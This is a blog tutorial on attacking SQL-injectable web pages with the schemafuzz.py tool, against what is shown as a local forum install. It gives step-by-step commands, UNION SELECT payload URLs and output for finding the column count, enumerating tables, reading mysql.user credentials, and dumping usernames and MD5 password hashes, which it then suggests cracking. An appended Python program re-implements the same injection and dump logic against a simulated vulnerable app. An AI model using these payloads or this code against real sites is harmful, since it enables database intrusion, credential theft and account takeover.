Tuesday, 02 February 2010

Schemafuzz.py

Download here

Most people probably already know how to attack a site with Schemafuzz.py... but no harm writing it up for those who don't yet...

Schemafuzz.py is written in Python (not the python that is the snake in that movie).
What Schemafuzz.py does is make it easy for you to find the tables and columns of a MySQL database behind a SQL-injectable web page....
Straight to it then, no long preamble... Watch carefully:

Before going further, we need to know which options the tool takes.
Run ./schemafuzz.py -h for the help text; among the options listed there, the ones we will use are these:
--schema, --dbs, --dump, --fuzz, --info, --full, --findcol

Step one:
----------------
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol
The output looks like this:
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1--
[+] Evasion Used: "+" "--"
[+] 01:32:04
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--
[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5
[-] Done!


Step two:
--------------
Once the column count is found, copy the "darkc0de URL" from the output and pass it in with --fuzz. The darkc0de token marks the column that the page reflects back; the tool replaces it with whatever expression it wants to read out, so every later step uses this URL:

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz
The output looks like this:
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:37:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Number of tables names to be fuzzed: 354
[+] Number of column names to be fuzzed: 263
[+] Searching for tables and columns...

[+] Found a table called: mysql.user

[+] Now searching for columns inside table "mysql.user"
[!] Found a column called:user
[!] Found a column called:password
[-] Done searching inside table "mysql.user" for columns!

[-] [01:37:48]
[-] Total URL Requests 618
[-] Done


Step three:
---------------
Now that we know the database name (webthings, shown under "Gathering MySQL Server Configuration"), we pull the full list of its tables and columns:

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D databasename
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:43:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing Tables & Columns from database "webthings"
[+] Number of Tables: 33

[Database]: webthings
[Table: Columns]
[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views
[1]wt_articles_title: article_id,category,title,active,date,userid,views
[2]wt_articlescat: cod,category
[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date
[4]wt_banners_log: banner,date,views,clicks,sessions
[5]wt_banners_rawlog: banner,type,date,session
[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box
[7]wt_comments: cod,type,link,date,userid,comment
[8]wt_config: id,config
[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text
[10]wt_downloadscat: cod,ref,name,descr
[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer
[12]wt_faq_topics: cod,name
[13]wt_forum_log_topics: uid,msgid,logtime,notifysent
[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies
[15]wt_forums: cod,title,descr,locked,notifies,register
[16]wt_forums_mod: forum,userid,type
[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst
[18]wt_links: id,category,active,name,url,count,descr,obs
[19]wt_linkscat: cod,name,descr,parent_id
[20]wt_menu: id,pos,title,url,type,newwindow,lang
[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos
[22]wt_newscat: cod,name,image
[23]wt_online: id,time,uid
[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks
[25]wt_picofdaycat: id,name,description
[26]wt_picofdaysel: date,picture_id,views,clicks
[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10
[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules
[29]wt_user_access: userid,module
[30]wt_user_book: userid,cod_user
[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify
[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,
newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail

[-] [01:43:48]
[-] Total URL Requests 270
[-] Done


To check whether load_file() works on that site, and whether the application's database account can read mysql.user, use --info. Both answers come down to the privileges of the account the web application connects as (testing@localhost here); a properly restricted account would say No to both.
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info

The output looks like this...
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:46:51
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--

[+] Do we have Access to Load_File: No

[-] [01:46:51]
[-] Total URL Requests 3
[-] Done


To list the databases the current user can access on that site, try this...

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dbs
It will show this:

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:58:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0] webthings

[-] [01:58:17]
[-] Total URL Requests 30
[-] Done


Next step (careful not to misstep)
--------------------
How to get the users and passwords:
we use --dump -D databasename -T tablename -C columnname

Once we have the database, table and column names, we issue the command like this....

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dump -D webthings -T wt_users -C name,password


Out come the usernames and password hashes...
The result is below....

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 02:08:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Dumping data from database "webthings" Table "wt_users"
[+] Column(s) ['name', 'password']
[+] Number of Rows: 2

[0] admin:e00b29d5b34c3f78df09d45921c9ec47:
[1] user:098f6bcd4621d373cade4e832627b4f6:

[-] [02:08:48]
[-] Total URL Requests 4
[-] Done
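As an added example (not code from the original post or from schemafuzz.py itself), here is the core of what the steps above do, written in Python against a simulated vulnerable page backed by in-memory SQLite so it runs offline: the --findcol column-count search, the --fuzz wordlist guessing of tables and columns (the fallback the MySQL 4 note at the end of this post refers to), the marker substitution that turns the darkc0de URL into the --info and --dump requests, and the dump itself. The vulnerable query, the SQLite back end, the wordlists and the rows in the fake wt_users table are assumptions; the table and column names come from the post.

```python
# Added example, not code from the original post or from schemafuzz.py.
# Re-implements the core of --findcol, --fuzz and --dump against a simulated
# vulnerable page backed by in-memory SQLite so it runs offline. The vulnerable
# query, the SQLite back end, the wordlists and the fake rows are assumptions.
import sqlite3
import urllib.parse

MARKER = "darkc0de"  # placeholder the tool swaps for whatever it wants to read


def make_vulnerable_app():
    """Simulates forum.php: the 'forum' parameter is pasted straight into SQL
    (the bug being exploited). Returns fetch(param) -> page body as text."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wt_forums(cod INTEGER, title TEXT, descr TEXT,
                               locked INTEGER, notifies INTEGER, register INTEGER);
        INSERT INTO wt_forums VALUES (1, 'General', 'Anything goes', 0, 0, 0);
        CREATE TABLE wt_users(uid INTEGER, name TEXT, password TEXT);
        INSERT INTO wt_users VALUES (1, 'admin', 'e00b29d5b34c3f78df09d45921c9ec47');
        INSERT INTO wt_users VALUES (2, 'user', '098f6bcd4621d373cade4e832627b4f6');
    """)

    def fetch(param):
        # The tool's "+" evasion stands in for spaces; the server decodes it.
        sql = ("SELECT cod,title,descr,locked,notifies,register FROM wt_forums "
               "WHERE cod=" + urllib.parse.unquote_plus(param))
        try:
            rows = db.execute(sql).fetchall()
        except sqlite3.Error as exc:
            return "Database error: " + str(exc)  # page leaks the DB error
        # Only the title column (index 1) is rendered, as on most real pages.
        return "\n".join(str(r[1]) for r in rows)

    return fetch


def find_columns(fetch, base, max_cols=20):
    """--findcol: grow UNION SELECT 0,1,...,n-1 until the page stops erroring,
    then put a marker in each position to see which column is reflected.
    Returns (column count, reflected column index, darkc0de template)."""
    for n in range(1, max_cols + 1):
        cols = [str(i) for i in range(n)]
        page = fetch(f"{base}+AND+1=2+UNION+SELECT+{','.join(cols)}--")
        if "error" in page.lower():
            continue  # wrong column count: the UNION itself fails
        for i in range(n):
            # Against MySQL the marker would be sent hex-encoded (0x...) to get
            # past quote filtering; SQLite has no such literal, so quote it.
            probe = cols[:i] + [f"'{MARKER}'"] + cols[i + 1:]
            if MARKER in fetch(f"{base}+AND+1=2+UNION+SELECT+{','.join(probe)}--"):
                tmpl = cols[:i] + [MARKER] + cols[i + 1:]
                return n, i, f"{base}+AND+1=2+UNION+SELECT+{','.join(tmpl)}"
    raise RuntimeError("no working column count up to %d" % max_cols)


def inject(template, expr, table=None):
    """Turn the darkc0de template into a concrete request, as --fuzz, --info,
    --schema and --dump do: the marker becomes an expression, optionally
    followed by a FROM clause (e.g. concat(user,0x3a,password) FROM mysql.user)."""
    payload = template.replace(MARKER, expr)
    if table:
        payload += f"+FROM+{table}"
    return payload + "--"


def fuzz_tables(fetch, template, wordlist):
    """--fuzz, table phase: a guessed table exists if selecting the marker FROM
    it returns the marker (an empty table would be missed, as with the tool)."""
    return [t for t in wordlist if MARKER in fetch(inject(template, f"'{MARKER}'", t))]


def fuzz_columns(fetch, template, table, wordlist):
    """--fuzz, column phase: SELECT <guess> FROM <table>; exists if no error."""
    return [c for c in wordlist
            if "error" not in fetch(inject(template, c, table)).lower()]


def dump(fetch, template, table, columns):
    """--dump: concatenate the wanted columns into the reflected column.
    SQLite's || is used here; schemafuzz sends MySQL's concat(a,0x3a,b),
    where 0x3a is a ':' written without quotes."""
    return fetch(inject(template, "||':'||".join(columns), table)).splitlines()


if __name__ == "__main__":
    fetch = make_vulnerable_app()
    count, null_col, template = find_columns(fetch, "1")
    print(f"[+] Column Length is: {count}")
    print(f"[+] Found null column at column #: {null_col}")
    print(f"[+] darkc0de URL: forum.php?forum={template}")
    for table in fuzz_tables(fetch, template, ["users", "members", "wt_users"]):
        cols = fuzz_columns(fetch, template, table, ["uid", "user", "name", "email", "password"])
        print(f"[+] Found a table called: {table} with columns {cols}")
    for row in dump(fetch, template, "wt_users", ["name", "password"]):
        print("[+]", row)
```

The same `inject()` call reproduces the --info probe from earlier in the post when given `concat(user,0x3a,password)` and `mysql.user`, and the --schema step is nothing more than the same substitution with a query against information_schema.columns, which is why that step needs MySQL 5.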


Don't forget to check schemafuzzlog.txt, the tool's log file.
After that, crack the password hashes with an MD5 cracker or whatever you like..... They are 32 hex characters with no salt, i.e. plain MD5; the second one is the well-known hash of the word "test", so a dictionary attack recovers hashes like these in seconds.

Nb:
The steps above work easily on MySQL 5 because --schema and --dbs read information_schema, which only exists from MySQL 5.0 on. On MySQL 4 you have to guess the table and column names yourself, which is what --fuzz does with its built-in wordlists....
